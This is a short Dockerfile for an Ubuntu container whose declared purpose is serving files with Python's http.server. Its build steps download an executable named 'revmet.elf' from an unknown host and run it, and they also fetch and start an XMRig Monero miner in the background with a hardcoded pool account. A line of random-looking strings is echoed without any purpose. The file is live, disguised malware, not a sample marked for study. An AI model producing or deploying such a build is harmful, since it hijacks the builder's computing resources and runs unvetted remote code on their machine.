FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo 2ZbsWdfKozCqb7cOlBcmQ0rAXv4DNuWe 3h7wNHKIhuGYzhGZD1El503h7UePiGq5 ZhyHxKtDlBvhpjX8Gg0LxlZdJdwBvCog VPGQBqqO5QGXAbbfzm3CHLz1tl3LU6ma PVoTXTUL2b6ynUDGpsCrjAQUVhUymFzg tbD7oXwf5zqlSzWQCu7jMmfcQptu8J0J DfaFmg3zwlXiKEdp1eLuf9i7AmvuQtxg 5bbbmibiYnFp0gujCs8voATQRRqWyUJK XU4smPg5a2zL0tyPLvkoFI871hCzpXhT AC7FylPN8v0se3ltBuhxGRr8hmdGgs3O 3CwrVfF5U6cH9Qh5vvHyWFBsjXCssB35 DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]